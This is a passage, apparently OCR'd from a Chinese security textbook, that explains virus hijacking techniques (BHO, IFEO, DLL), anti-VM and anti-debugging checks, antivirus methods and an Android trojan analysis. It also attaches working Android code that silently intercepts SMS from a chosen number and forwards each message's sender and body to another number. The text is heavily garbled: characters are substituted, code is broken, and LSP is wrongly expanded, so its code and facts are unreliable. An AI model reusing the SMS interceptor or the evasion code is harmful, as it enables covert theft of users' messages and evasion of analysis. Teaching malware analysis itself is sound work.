CurrentVersion\Explorer\Browser Helper Objects\， 如 图 9-8$ 所 示 。 其 下 的 项 名 即 为 对 应 的 
ВНО. 
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Ё Explorer 

р ‚№ Advanced 

> й АррКеу 

H Associations 

р “和 АшоСотрее 

b ~ AutoplayHandlers 

| Е 1. ВгомѕеМемРгосеѕѕ 

«| 1. Browser Helper Objects 

| = 1. (B69F34DD-F0F9-42DC-9EDD-957187DA688D) 


图 9-85 ” ”BHO 注册 表 

在 HKEY LOCAL MACHINE\SOFTWARE\Classes\CLSID\ 下 ， 可 以 找到 BHO 对 应 的 
注册 项 。 其 中 CLSID 属 于 GUID (Globally Unique Identifier) ， 也 称 作 UUID (Universally 
Unique Identifier) ， 它 是 全 局 唯一 标识 从 ， 作 为 COM 类 的 标识 和 从。 

其 中 InprocServer32 下 键 值 数据 所 表示 的 是 BHO 加 载 的 DLL 文件 〈 见 图 9-86) 。 病 毒 则 
会 将 自身 添加 进 BHO 且 加 载 恶 意 DLL 来 劫持 浏览 器 。 

(3) LSP 动 持 

LSP (Label Switched Path， 分 层 服务 提供 程序 ) 全 称 是 Winsock LSP， 它 是 TCP/IP、 
UDP/IP 等 协议 的 接口 。LSP 动 持 则 是 指 支持 其 发 送 消息 的 机 制 ， 比 如 在 TCP 协 议 下 ， 病 毒 
重 写 WSPConnect 函 数 ， 拦 截 卫 并 且 进 行 跳 转 ，UDP 协 议 下 ， 其 重 写 WSPSend 函 数 ， 替 换 
服务 器 主机 名 。 


| г: J. (B69F34DD-F0F9-42DC-9EDD-95718; ЭВ) ESU) REG_SZ САРгодгат Files (х86)\360\3605аѓе\ѕаѓетог\... 
| | РАЙ implemented Catogories 28 ThreadingMod... REG_SZ Apartment 

: | м InprocServer32 

~“ Род 

ШЕТ 

| | L. №} VersionindependentProgID 
25-2 (B6AFFB50-6F46-498B1-B912-C3F7A8` 
-月 (86844д97-8802-446е-9846-ЗАВОСС | MESHE M): 
| b - J 1В6С0Е598-3140-4563-8С5С-4014Ғ2 
СОРИ (B6C292BC-7C88-41EE-8B54-8EC926 
С b- J (b6dc98b1-0bec-45e1-b2e4-3a2d94; 


数值 名 称 M): 
ФА) 


图 9-86 ”加 载 DLL 
2. 映像 /镜像 劫持 


В 9): (Image File Execution Options, IFEO) 是 早期 病毒 对 付 杀 毒 软 件 的 一 大 
手段 ， 其 实 也 只 是 使 用 完全 权限 ， 在 注册 表 HKEY LOCAL MACHINE\SOFTWARE\ 
Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ 下 新 建 一 个 Debugger 
项 ， 项 的 名 称 为 劫持 的 软件 名 称 ， 如 cmd.exe。 随 后 将 该 项 的 键 值 改 为 一 个 不 存在 的 文 
件 ， 比 如 asdadasdasdasd.exe， 如 图 9-87 所 示 。 


FEO ЕЕ ЕЕ (У) KERA 帮助 H) 


(С) xwsetup EXE ^ Ят 类 型 数据 

а Your Image File На GHU) REG_SZ ФН) 

Ey cmd. exe [а] Debugger REG_SZ asdadasdasdasd. exe 
(СД IME Compatibility 


图 9-87 IFEO 
每 当 打 开 cmd.exe 时 ， 系 统 会 先 访问 该 注册 表 下 的 Debugger 键 值 所 指 癌 的 文件 ， 即 
asdadasdasdasd.exe， 而 该 文件 不 存在 时 cmd.exe 目 然 就 无 法 被 打开 ， 同 理 作 用 于 杀毒 软 
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件 ， 这 就 是 病毒 对 抗 杀毒 软件 的 原理 。 
3. DLL 劫持 


操作 系统 在 加 载 DLL 文 件 时 ， 先 会 搜索 程序 所 在 的 目录 ， 帮 没有 则 会 搜索 系统 目录 。 
DLL 劫持 正 是 利用 系统 的 这 个 机 制 ， 在 程序 目录 下 创建 一 个 与 系统 DLL 名 称 、 导 出 函数 相 
同 (为 了 维持 程序 正常 运行 )， 但 是 内 含 病 毒 代 码 的 DLL 文 件 。 当 应 用 程序 加 载 该 DLL 
时 ， 病 毒 代码 也 就 神 不 知 鬼 不 觉 地 运行 了 。 
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鉴于 许多 安全 人 员 通 过 虚拟 机 搭建 蜜 缸 系统 作为 分 析 病 毒 的 强 有 力 手段 ， 病 毒 往往 在 
自身 代码 中 植 入 检测 虚拟 机 的 代码 。 


1. 检测 虚拟 机 的 一 般 手 段 


检测 虚拟 机 的 一 般 手段 主要 是 搜索 相关 VM 虚 拟 机 的 字符 串 ， 如 搜索 虚拟 机 服务 进程 
使 用 CreateToolhelp32Snapshot、Process32First、Process32Next 三 个 函数 遍历 进程 ， 来 搜索 
虚拟 机 的 相关 进程 。 
HANDLE WINAPI CreateToolhelp32Snapshot ( // 快 照 
DWORD dwFlags, / /快照 内 容 类 型 
DWORD th32ProcessID // 进 程 ID 
); 


CreateToolhelp32Snapshot A ЖМН ЛЕН ИНТЕ, ЯЖ Войт БОЖЕ 
列表 。 参 数 一 dwFlags 有 如 下 选择 。 

> TH32CS INHERIT: 快照 句柄 可 以 被 继承 。 

> TH32CS_SNAPALL: 所 有 的 进程 、 线 程 、 由 th32ProcessID 指 定 的 进程 模块 。 

> TH32CS SNAPHEAPLIST: 由 th32ProcessID 指 定 进程 中 的 堆 。 

> TH32CS $МАРМОРОГЕ: 由 th32ProcessID 指 定 进 程 模块 。 

> TH32CS SNAPMODULE32: 由 th32ProcessID 指 定 64 位 程序 进程 中 的 32 位 进程 模块 。 

> TH32CS SNAPPROCESS: 系统 全 部 进程 信息 。 

> TH32CS SNAPTHREAD: 系统 全 部 线程 信息 

本 例 选择 TH32CS_SNAPPROCESS， 而 参数 二 则 设置 为 0， 表 示 无 指定 进程 。 


BOOL ИТМАРТ Process32First( | // 从 快照 中 检索 进程 信息 
HANDLE hSnapshot, // 由 createToolhelp32Snapshot 函 数 返 还 的 句柄 
LPPROCESSENTRY32 1рре // 指 向 PROCESSENTRY32 结 构 体 的 指针 
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参数 二 指向 了 PROCESSENTRY32 结 构 体 。 


BOOL WINAPI Process32Next ( 
HANDLE hSnapshot, 
LPPROCESSENTRY32 lppe 
); 
typedef struct СадРВОСЕЗЗЕМТВУЗ2 | 
DWORD qdwSize;// 结 构 体 大 小 , 使 用 前 必须 使 用 sizeof (РВОСЕЗЗЕМТВУЗ2) 进行 设置 
DWORD cntUsage; // 进 程 引 用 计数 , 必须 设置 为 1 
DWORD th32ProcessID; // 进 程 ID 
DWORD th32DefaultHeapID; //Ж ІР 


DWORD th32ModuleID; // 进 程 模块 ID, 必须 设置 为 0 

DWORD сп Тргеадз; // 线 程 的 数量 

DWORD th32ParentProcessID; //ХИ ВТО 必须 设置 为 0 

LONG  рсРг1С1аззВазе; / /进程 创 建 线 程 的 优先 级 

DWORD dwFlags; // 预 留 信息 

TCHAR szExeFile[MAX PATH]; ”// 以 null 结 尾 的 字符 串 , 包含 该 进程 的 可 执行 文件 的 文件 名 
DWORD th32MemoryBase; // 可 执行 程序 的 加 载 地 址 

DWORD th32AccessKey; / /控制 进程 地 址 空间 可 见 度 


| РВОСЕЗЗЕМТВУЗ2; 


检测 虚拟 机 具体 流程 则 为 : 


РВОСЕЗЗЕМТВУЗ2 реЗ2; 
pe32.dwSize = sizeof (pe32); // 使 用 结构 体 保存 进程 信息 
HANDLE hProcessSnap =CreateToolhelp32Snapshot (TH32CS 5МАРРКОСЕ55,0); 


// 创 建 快照 


随后 建立 循环 ， 在 使 用 Process32First(hProcessSnap,&pe32)，Process32Next(hProcessSn 
ap,&pe32) 中 间 碍 找 虚拟 机 进程 ， 如 使 用 strcmp(pe32.szExeFile,"VMWwareUserexe" ) 语 句 。 


2. 通过 内 存 来 检测 虚拟 机 


虚拟 机 为 避免 与 物理 主机 神 突 ， 它 在 内 存 映 射 方面 与 物理 主机 存在 差异 ， 因 此 可 以 通 
过 检测 内 存 的 方式 来 检测 虚拟 机 ， 如 检测 IDT (Interrupt Descriptor Table, P RIRIK ) 
的 地 址 ， 其 中 VMware 虚拟 机 中 IDT 地 址 为 0xFFxxxxxx， 而 物理 主机 中 IDT 地 址 不 会 高 于 
0xDOxxxxxx， 因 此 可 以 通过 执行 SIDT 指 令 检 测 IDTR (Interrupt Descripter Table Register, 
中 断 描 述 符 表 寄存 器 ) ，IDTR 用 于 存放 IDT 地 址 ， 然 后 判断 返回 LowIDTbase 的 第 一 个 字 
节 是 否 高 于 0XD0， 以 此 来 检测 虚拟 机 环境 。 
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typedef structt 


WORD IDTLimit; //IDT 的 大 小 

WORD LowIDTbase; ”//IDT 的 低位 地 址 

WORD HiIDTbase; //IDT 的 高 位 地 址 
} IDTR; 


同 理 可 以 检测 LDT (Local Descriptor Table， 本 地 摘 述 符 表 ) 与 GDT (Global 
Descriptor Table, + А92) ， 当 LDT 位 于 0x0000 时 ， 为 物理 主机 ; 当 GDT 位 于 
0xFFxxxxxx 时 ， 为 虚拟 主机 。 


3. 其 他 方法 


另外 ， 还 可 以 通过 搜索 “VMware” 字 符 串 来 检测 虚拟 机 的 注册 表 项 ， 进 而 检测 虚拟 
机 是 否 存在 。 此 外 也 可 以 从 物理 硬件 层面 进行 检测 ， 如 检测 网 卡 的 MAC 地 址 、BIOS 等 。 


936 反 调 试 技术 

病毒 侦 测 虚 拟 机 的 同时 ， 也 存在 被 调试 器 分 析 的 风险 ， 因 此 病毒 会 在 自身 代码 中 实现 
反 调试 技术 ， 常 见 的 反 调试 技术 有 以 下 几 种 。 

1. 查询 PEB 


BOOL IsDebuggerPresent (void) 
// 若 程序 处 于 调试 环境 ， 则 返回 TRUE， 否则 返回 FALSE 


BOOL CheckRemoteDebuggerPresent ( 


HANDLE hProcess, // 进 程 句柄 ， 由 GetCurrentProcess 返 回 得 到 
PBOOL pbDebuggerPresent // 用 来 接收 返还 结果 的 布尔 值 参数 
下 / /调试 环境 下 返回 TRUE， 非 调试 环境 下 返回 FALSE 


使 用 之 前 介绍 过 的 NtQueryInformationProcess 妙 数 ， 并 且 将 其 参数 二 设置 为 
ProcessDebugPort (0x7)， 返 回 0 表 明 程序 没有 被 调试 ， 调 试 状 态 下 将 返回 调试 的 端口 号 。 

以 上 三 个 函数 均 采 用 了 检测 PEB 结 构 中 的 BeingDebugged 参 数 信 息 ， 同 样 也 可 以 通过 
汇编 代码 获取 该 信息 。 


int ара; / /声明 整 形变 量 接受 BeingDebugged 的 值 
asmt{ //32 位 系统 环境 

mov еах,Ёѕ: [308] // 定 位 PEB 

mov eax, [eax + 2h] // 定 位 BeingDebugged 

mov dbg,eax / /接收 BeingDebugged 的 值 


} 
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最 后 检测 dbg 的 值 ， 右 dbg 的 值 为 0， 则 表明 非 调试 环境 。 同 样 在 PEB 绪 构 中 被 改变 的 
还 有 一 些 Heap (HE) 标志 ， 如 ProcessHeap、NTGlobalFlag。 


2. 扫描 进程 


程序 可 以 使 用 CreateToolhelp32Snapshot、Process32First、Process32Next 三 个 函数 持续 
对 进程 进行 扫描 ， 查 找 如 “ida.exe”“OllyDbg.exe” 之 类 的 调试 软件 ， 也 可 以 直接 使 用 
FindWindow 函 数 进 行 窗口 查找。 


НИКО FindWindow ( 
LPCTSTR lpClassName，// 窗 口 的 类 
LPCTSTR lpWindowName // 窗 口 的 名 称 
); 


参数 一 可 以 为 NULL， 参 数 二 中 只 要 包含 调试 程序 名 称 的 部 分 字符 串 即 可 ， 如 
FindWindow(NULL, "оПудЬе "); 即 可 。 


3. 时 间 间 隔 检 测 


这 里 介绍 RDTSC 指 令 。 
RDTSC 指 令 返 回 的 是 自 开 机 以 来 的 CPU 的 周期 数 ， 返 回 的 是 一 个 64 位 的 值 
EDXL:EAX (高 32 位 在 EDX， 低 32 位 在 EAX) ， 那 么 使 用 方法 是 如 下 。 


int time first, time last, time sub 
ЕСЕН 
га! зс 


mov time first, еах 


ER // 部 分 程序 代码 


mov time last, еах 


) 


time sub = time last - time first 


通过 比较 time_sub 的 差 值 是 否 大 于 正常 运行 时 间 ， 从 而 判断 程序 是 否 位 于 调试 环境 ， 
与 之 相似 的 函数 有 : 

DWORD GetTickCount (void) 

BE 01а 250) 210 Н 16 р НУ 1а] Ж, Да) р А. A Н 210 EIA 
法 ， 计 算 时 间 差 ， 判 断 调试 环境 。 
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4 WE 


加 壳 是 运用 加 密 算法 将 程序 压缩 ， 修 改 程序 入 口 点 (Oniginal Entry Point, ОЕР) ， 加 密 程 
序 源码 ， 在 内 存 中 加 载 时 进行 解码 ， 从 而 阻止 调试 软件 对 程序 代码 在 用 户 层面 的 修改 。 


5. ПР 


加 “人 花 ” 是 指 加 入 花 指 令 ， 伦 指令 由 一 些 汇 编 语言 组 成 的 干扰 调试 人 员 进 行 分 析 的 代 
码 ， 程 序 能 够 正常 运行 ， 但 会 造成 反 汇 编 出 错 。 
从 源码 上 学 习 完 以 上 小 节 之 后 ， 再 次 请 问 什 么 是 计算 机 病毒 ? 


94 反 病 三 技术 介绍 


9.4.1 特征 码 ( 值 ) 扫描 


首先 我 们 介绍 杀毒 软件 最 传统 的 杀毒 方法 一 一 特征 码 扫 描 。 特 征 码 是 由 反 病 毒 分 机 人 
员 从 病毒 样本 的 中 不 同位 置 提取 的 一 系列 字 节 ， 也 就 是 市 有 病毒 特征 的 一 系列 代码 。 随 后 
这 些 代 码 经 过 严格 的 实验 及 比 对 ， 最 终 将 符合 条 件 的 特征 码 整合 在 一 起 ， 病 毒 库 〈 又 名 特 
征 码 库 ) 由 此 诞生 。 

特征 码 扫描 则 是 使 用 自身 引擎 反 编 译文 件 代 码 ， 并 且 代 码 内 搜索 匹配 是 售 含 有 病毒 库 
中 的 特征 码 和 特征 码 偶 移 的 位 置 ， 进 而 判断 文件 是 否 为 病毒 文件 。 在 病毒 与 杀毒 软件 的 斗 
争 中 ， 病 毒 库 显 然 无 法 及 时 更 新 跟 上 病毒 的 开发 步伐 ， 同 时 也 会 因为 病毒 加 壳 、 加 人 花 免 杀 
从 而 难以 扫描 出 符合 的 特征 色 ， 虽 然 其 后 增加 了 复杂 特征 码 扫描 以 及 隐藏 特征 码 扫 挡 ， 但 
特征 码 扫描 始终 无 法 做 到 “ 快 毒 一 步 ”， 因 此 局 发 式 扫 拉 作为 弥补 特征 码 扫 拉 的 缺陷 而 被 
开发 出 来 。 


9.4.2 ”局 发 式 扫 摘 


局 发 式 扫描 分 为 静态 月 发 式 扫描 与 动态 月 发 式 扫 挡 。 静 态 月 发 式 扫描 以 特征 码 扫描 为 
基础 ， 通 过 反 汇 编 在 不 运行 的 条 件 下 对 目标 文件 进行 特征 指令 扫描 ， 如 果 其 使 用 的 指令 组 
合 与 原先 由 专家 经 验 分 析 得 出 的 病毒 指令 (通常 是 带 有 病毒 性 质 的 API 函 数 的 组 合 ) 相似 
度 遇 ， 束 会 被 判断 为 病毒 程序 。 动 态 局 发 式 扫 摘 则 是 结合 杀毒 软件 内 置 的 虚拟 机 技术 〈 软 
件 模 拟 CPU 等 仿真 环境 ) ， 将 病毒 动态 运行 在 虚拟 机 中 并 检测 其 行为 ， 奉 发 现 类 似 病毒 的 
可 疑 行 为 ， 则 判定 为 病毒 程序 。 

局 发 式 扫 摘 在 未 知 病毒 的 检测 方面 起 到 了 关键 性 的 作用 ， 弥 补 了 特征 码 扫 描 无 法 第 一 
时 间 检 测 最 新 病毒 的 缺陷 ， 当 然 局 发 式 扫 接 存 在 误 报 的 情况 ， 但 很 明显 是 利 大 于 潍 了 。 
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为 了 起 到 实时 、 主 动 防护 病毒 入 侵 的 作用 ， 主 动 防御 技术 打破 了 传统 杀毒 软件 检测 
特征 码 的 思路 。 首 先 它 在 驱动 内 核 层 次 加 载 自 身 ， 从 而 避免 目 身 进程 在 用 户 层面 被 病毒 终 
Ж; 其 次 ， 就 像 之 前 介绍 的 键盘 钩子 HOOK， 主 动 防御 技术 在 操作 系统 中 HOOK 了 一 些 病 
毒 常用 的 API 函 数 ， 每 当 有 程序 使 用 这 些 API 函 数 的 时 候 ， 它 会 根据 程序 使 用 的 API 函 数 以 
及 伴随 这 些 API 函 数 做 出 的 行为 推测 该 程序 是 否 为 病毒 ， 进 而 做 到 实时 监控 。 

主动 防御 技术 避免 了 在 用 户 在 不 知情 的 情况 下 运行 病毒 ， 并 且 对 未 知 病毒 也 起 到 了 一 
定 的 防范 作用 。 同 时 ， 如 360 安 全 卫士 等 杀毒 软件 在 主动 防御 技术 中 也 增添 了 漏洞 实时 修 
补 功 能 ， 杜 绝 了 病毒 通过 漏洞 入 侵 计 算 机 。 


944 REX 


由 于 传统 杀毒 方法 的 病毒 库 巳 大 以 及 杀毒 内 存 开销 大 等 缺点 ， 云 伍 杀 将 成 为 未 来 东 毒 
软件 的 主流 趋势 。 云 合 杀 将 特征 码 库存 于 服务 器 问 ， 在 合 杀 时 通过 安全 公司 的 “ 云 计算 ” 
手段 ， 实 现 了 在 短 时 间 内 迅速 三 杀 以 及 云 并 病毒 库 快 速 更 新 ， 但 其 缺点 是 需要 保证 一 个 畅 
通 无 阻 的 网 络 环境 ， 并 且 有 隐私 泄露 的 危险 。 


9.5 Android 木马 


随 看 智能 手机 的 普及 ， 移 动 互联 网 已 然 成 为 了 生 ЖБ @ @ ^ш 18:17 
iah An] РН А2. «ЕН ХАПЫК Е, РАМН 81 com.android.system.ad.. 
毒 的 黑色 产业 链 便 慢 慢 出 现 了 。 手 机 病毒 的 目的 非常 简 
单 ， 即 是 通过 获取 用 户 隐私 来 牟利 Do you want to э this application? 

大 多 数 手机 病毒 都 有 共同 的 特性 ， 窃 取 用 户 信息 并 НИ 
悄悄 向 增值 服务 号 码 发 送 短信 ， 自 启动 以 及 高 隐蔽 性 。 шс: 


前 两 年 出 现 了 一 种 被 称 为 “Backdoor.AndroidOS. ° зене Pia ос connections h 
Obad.a” 的 极 具 代表 性 的 Android 木 马 ， 如 图 9-88 所 示 。 Your personal information 
该 木马 利用 了 当时 “Android 操 作 系统 此 前 位 置 的 漏洞 来 ка окш нус; 
提升 程序 的 权限 ， 并 且 能 够 阻止 被 卸载 ”。 到 底 为 什么 DC 
这 个 木马 如 此 强大 呢 ， 于 是 手机 安全 专家 们 就 对 其 展开 Phone calls 
了 深度 剖析 。 теди йет 


Services that cost you money 
tly са! bi ' 


(1) ЖЖ НА Ak РЕЗЕ те та» К ЕЛЕСІ М$ тезза 
木马 的 代码 复杂 烦琐 得 多 。 显 然 ， 复 杂 的 代码 并 不 足 这 ИД 
款 木 马 唯 一 神奇 的 地 方 。 Cancel Install 
(2) Odab.a 的 AndroidManifest.xml 文 件 也 非常 精 图 9-88 ”安装 界面 
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妙 ， 木 马 作 者 在 对 Android 的 漏洞 挖掘 及 利用 之 后 ， 使 用 了 非 谷 歌 标准 的 AndroidManifest. 
xml 文 件 〈 见 图 9-89) ， 并 使 其 能 够 正常 被 智能 手机 运行 。 


<application =".СОсСсс1"> | 


<activity ="System" -".ССОІО11"> 
<intent-filter> 
<action android:name=w="android.intent.action.MAIN" /> 
<category android:name=w"android.intent.category.LAUNCHER" /> 
</intent-filter> 
</activity> 
<activity w="System" =".cCoIOIOo" ="в1п91еТор" /> 
<service =".OCOcCO11" /> 
<receiver ="System" =".ОС11СоО" ="android.permission.BIND DEVICE ADMIN "> 
<meta-data ="android.app.device admin" ="@хш1/ссс1осс" /> 
<intent-filter> 
<action android:name=w="com.strain.admin.DEVICE ADMIN ENABLED" /> 
</intent-filter> 


<service =".MainService" /> 
<receiver =" .10О1СОсї"> 
<intent-filter ="1000"> 
<action android:namesw"android.intent.action.BOOT_ COMPLETED” /> 
<action android:name=w"android.intent.action.QUICKBOOT РОМЕВОН" /> 


图 9-89 AndroidManifest.xml 文 件 


(3) 该 木马 通过 对 指令 代码 进行 特殊 处 理 ， 从 而 阻止 反 编 译 。 该 木马 除了 对 代码 进 
行 加 密 处 理 以 外 ， 还 通过 对 指令 代 人 码 进行 特殊 处 理 ， 使 得 安全 公司 常用 的 Java 反 编译 工具 


4% -, = = 


lasses-dexzjarjar (3 


ЕВ com_android 
> Ë internal.telephony 
Y 83 system.admin 
» ІЛ ссоюй 
П сспосс 
Ш скоксо 


[Л ксосс 

Ш) ІШІСІ 

ІЛ lololol 

[DN MainService 
Л OCICooCI 
Ш) ососсой 
M Aran 


P 
P 
Е 
» 
P 
> 
> | 
> 
P 
> 
> 
» 
> | 
> 
b 
> 
P 
P 
> 
> 
P 
P 
> 
+ 


〈 见 图 9-90) 无 法 正确 地 反 编 译 其 指令 ， 增 加 了 对 木马 的 分 析 难 度 。 


CClIOccclass 6) CICoICCo.class | 


byte[] arroyOfByte2 = new byte[j]; 
int k = 0; 
int m; 
if (arrayOfBytel == null) 
пе j; 
for (int n = рагатіл%2; ; п < arrayO0fBytel[paramInt2]) 
{ 
раготіп%2%»; 
і = -4 + (m + n); 
array0f8yte2[k] = ((byte)i); 
k++*; 
if (k >= j) 
return new String(orrayOfByte2, 0); 
m= і; 
) 
) 


// ERROR // 
public final void гип() 
{ 
// Byte code: 
9: invokestatic 168 java/l<loang/System:currentTimeMillis O 
: |збоге. 1 
: пет 154 java/lang/ String 
?: дир 
: bipush 19 
18: sipush 498 
13: Бъризп 236 
15: зпиокез а ъс 170 сот/ апйготд/ зузрет/абтп/ ССПОсе: СИС (TII)Ljavo/long/S 
18: trnvokestatic 175 com/androld/system/admin/oCI1I1Cll:oC11C1l1 (1 зауа/|апа/ 541 па 


图 9-90”Java 反 编译 工具 


(4) 此 木马 无 法 被 删除 。Android 系 统 从 2.2 版 本 开始 ， 提 供 了 一 个 “设备 管理 器 ”的 
功能 ， 其 初衷 是 为 企业 部 署 远 程 IT 控 制 使 用 ， 为 了 防止 员工 私自 卸载 企业 安装 的 “设备 管 
理 器 ”， 一 有 旦 激活 设备 管理 器 之 后 ， 该 设备 管理 器 就 不 可 删除 〈 见 图 9-91) 。 但 是 ， 由 于 


— S — 


—ssa. ` 
N 


Мой М 


Android 系 统 对 此 功能 设计 得 不 完善 ， 使 得 木马 可 以 利用 这 个 机 制 ， 让 目 己 注册 成 为 一 个 
АРНАТ, ЛЕНЕ Р. 

(5) 一 旦 用 户 不 慎 “激活 ”木马 ， 它 就 被 注册 成 了 设备 管理 器 ， 此 时 该 木马 的 “ 强 
行 停止 ”和 “ 番 载 ”按钮 将 完全 失效 ， 即 木马 无 法 关闭 且 无 法 番 载 。 另 外 由 于 设备 管理 需 
的 权限 以 及 木马 目 身 使 用 非 标准 的 手段 来 注册 设备 管理 器 ， 所 以 即使 Android 让 它 注册 成 
功 了 ， 它 也 不 会 在 设备 管理 器 列表 中 显示 ， 用 户 因此 找 不 到 取消 注册 设备 管理 器 的 入 口 ， 
便 无 法 取消 此 木马 的 权限 ， 如 图 9-92 所 示 。 


| | 要 激活 设备 管理 器 吗 ? 


“ 
е System 


\tte ае СРЯДА TES the аррис: 
adm ес 


КЕ 此 管理 器 可 4/ bt 秆 应 
РА" ‘android.s em.admin" 执 行 以 下 操作 : 


制 屏 幕 锁 定 的 方式 和 时 间 


没有 可 供 显 示 的 设备 管理 器 


图 9-91 激活 界面 图 9-92 木马 注册 后 ,设备 管理 器 显示 “没有 可 供 
显示 的 设备 管理 器 ” 


通过 以 上 分 析 发 现 ， 如 果 用 户 在 最 开始 不 给 予 木 马 权 限 的 话 ， 那 么 它 就 不 会 造成 很 大 
的 危害 ， 所 以 ， 民 好 的 手机 使 用 习惯 是 目 己 不 “中 招 ” 的 最 重要 的 环节 ， 建 议 : 

> 不 要 随便 安装 来 源 不 可 靠 的 软件 ; 

> 不 要 随便 给 予 不 可 靠 软 件 设备 权限 ; 

> 习惯 性 地 检查 手机 文件 ， 看 看 有 没有 可 疑 文件 ; 

> 安装 软件 之 前 ， 仔 细 查 看 该 软件 需要 哪些 权限 并 且 是 否 确 实 需要 这 些 权 限 才 能 运 

行 APP 完 整 功能 。 
下 面 ， 附 上 安 早 短信 发 送 代码 : 


раскаде com.android.service; 


import jJava.text.SimpleDateFormat; 
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import 
import 
import 
import 
import 
import 


import 


жон 病毒 不 神秘 人 ШЕ 


апагоіа.аппоёаіёіоп. Ѕ5ирргеѕѕііпі; 
апаго1іа. сопёепі .Вгоаасаѕіёвесеіуег; 
апагоіа. сопёепі .Сопіехі; 

апаго1іа. сопіепі .Іпіёепі; 
апагоіа.оѕ.Випа1е; 
апагоіа.ёе1ерһопу. $т5Мападег; 


апагоіа.ёе1ерһопу.5ют5Меѕѕаде; 


public class а extends ВгоаасаѕіКесеіуег | 


public static final String SMS RECEIVED ACTION = 


"android.provider.Telephony.SMS RECEIVED"; 


@SuppressLint ("SimpleDateFormat") 


@Оуегг1 ае 


public void опВесетуе (Context context, Intent intent) | 


Bundle bundle = intent.getExtras (); 


Object || objects = (Object[]) bundle.get ("рап"); 


for (Object obj : objects) { 


// 注 册 SmsMessadge 
SmsMessage smsMessage=SmsMessage.createFromPdu ( (byte[]) obj); 
String body = smsMessage.getDisplayMessageBody (); 
String addres = smsMessage.getDisplayOriginatingAddress (); 
long date = smsMessage.getTimestampMillis (); 
// 格 式 化 时 间 
SimpleDateFormat format = new SimpleDateFormat ( 
"Yyyy MM-dd hhimmi:5Ss"); 

String datestr = format.format (date); 
System.out.printin (addres + ":" + dateStr + ":" + body); 
// 拦 截 指定 号 码 短信 
if (ад9гез.едпа15 ("5554")) { 

abortBroadcast (); 

smsManager smsManager = SmsManager.getDefault(); 

// 回 传 短信 到 指定 号 码 

зшзМападег - зепдТехтМеззаде ("5556", null, addres + ":" 


1 пасезег рота о аа ВЕ 
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} 


安里 的 短信 都 是 按 广 播 的 形式 处 理 ， 所 以 只 需要 对 广播 进 行 监听 就 可 以 ， 当 BroadcastReceiver 
优先 级 大 于 其 他 的 BroadcastReceiver 的 优先 级 的 时 候 ， 便 可 以 使 用 abortBroadcast(O 来 将 此 
广播 拦截 ， 使 其 他 APP 无 法 接收 到 此 广播 。 


<!-- 注册 receive 并 设置 优先 级 --> 
<гесетуег android:name="com.android.service.a" android:exported="false"> 
<intent-filter android:priority="10000"> 
<action android:name="android.provider.Telephony.SMS 
ВЕСЕІМЕр"/> 
</intent-filter> 


</гесетуег> 


96 Жл 


本 章 首 先 介 绍 了 计算 机 病毒 的 起 源 以 及 发 展 过 程 ， 帮 助 谈 者 了 解 了 什么 是 计算 机 病 
毒 。 然 后 通过 行为 分 析 手 段 来 讲解 各 种 病毒 分 析 工 具 的 使 用 方法 ， 从 而 使 读者 更 加 透彻 地 
了 解 计 算 机 病毒 的 行为 ， 绸 从 代码 层面 揭 开 计算 机 病毒 神秘 的 面纱 。 接 下 来 介绍 了 计算 机 
病毒 的 其 他 常用 技术 手段 、 反 分 析 手 段 和 杀毒 软件 技术 原理 ， 从 其 他 方面 揭示 计算 机 病毒 
的 本 质 其 实 就 是 一 些 API 函 数 的 连 招 组 合 。 最 后 分 析 了 一 个 安 日 病 毒 实 例 ， 随 看 移动 手机 
的 普及 ， 手 机 病毒 也 成 为 未 来 病毒 发 展 的 重要 趋势 ， 加 上 大 多 数 人 对 移动 设备 病毒 的 防御 
意识 薄弱 ， 更 让 恶意 黑客 有 机 可 乘 。 要 防御 病毒 的 攻击 ， 就 要 求 储备 更 多 的 安全 知识 。 通 
过 本 章 的 学 习 ， 读 者 会 发 现 病毒 其 实 并 不 神秘 ， 只 要 我 们 怀 看 一 份 探索 未 知 〈 不 仅仅 是 计 
算 机 安全 ) 的 热忱 ， 一 份 对 于 知识 的 强烈 渴求 ， 通 过 不 断 钻 研 ， 定 能 有 所 突破 。 
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安全 领域 的 知识 博大 精深 ， 几 乎 没有 人 能 掌握 全 部 的 知识 技能 ， 想 要 学 习 更 多 的 知 
识 ， 就 一 定 不 能 局 限于 茶 一 领域 。 本 章 将 讲解 一 项 在 安全 领域 比较 前 沿 的 范 赛 一 一 CTF。 


10.1 CTF 简介 


СТЕ (Capture The Flag) 一 般 译作 夺 旗 赛 ， 它 作为 信息 安全 领域 选拔 人 才 和 互相 比拼 
技能 水 平 的 比赛 ， 夺 旗 赛 被 越 来 越 多 的 人 所 关注 。 这 种 比赛 形式 起 源 于 1996 年 的 DEFCON 
全 球 黑 客 大 会 ， 这 次 大 会 上 用 虚拟 夺 旗 竞赛 的 形式 代替 之 前 黑客 之 间 的 真实 攻击 。CTF 
现在 已 经 成 为 全 球 范围 网 络 安全 圈 流 行 的 竞赛 形式 。DEFCON 作 为 CIF 赛 制 的 发 源 地 ， 
DEFCON CTF 也 成 为 了 代表 目前 全 球 最 高 技术 水 平和 影响 力 的 CIF 竞 赛 。 


10.1.1 CTF 的 三 种 竞赛 模式 


CTF 竞 赛 模式 分 为 以 下 三 类 。 
1. 解 题 模式 ( Jeopardy ) 


参赛 队伍 可 以 通过 互联 网 或 者 现场 的 网 络 参与 ， 这 种 模式 的 CTF 竞 赛 与 ACM 编 程 竞 
赛 、 信 息 学 奥赛 比较 类 似 ， 以 解决 网 络 安全 技术 挑战 题目 的 分 值 和 时 间 来 排名 ,通常 用 于 
在 线 选 拔 赛 。 题目 主要 包 仿 逆向、 漏洞 挖 据 与 利用 、Web 渗 透 、 密 码 、 取 证 、 隐 写 、 安 全 
编程 等 ， 这 也 是 新 手 最 早 也 是 最 容易 接触 到 的 CTF 竞 赛 模式 。 


2. 攻防 模式 ( Attack-Defense ) 


在 攻防 模式 CITF 赛 制 中 ， 参 赛 队伍 在 网 络 空间 互相 进行 攻击 和 防守 ， 挖 掘 网 络 服务 漏 
洞 并 攻击 对 手 服务 来 得 分 ， 通 过 修补 自身 服务 漏洞 进行 防御 来 避免 丢 分 ， 这 多 数 出 现在 线 
下 比赛 中 。 攻 防 模式 CTF 赛 制 可 以 实时 通过 得 分 反映 出 比赛 情况 ， 最 终 也 以 得 分 直接 分 出 
胜 负 ， 是 一 种 竞争 激烈 、 具 有 很 强 的 观 贫 性 和 高 度 透明 性 的 网 络 安全 赛制 。 在 这 种 赛制 
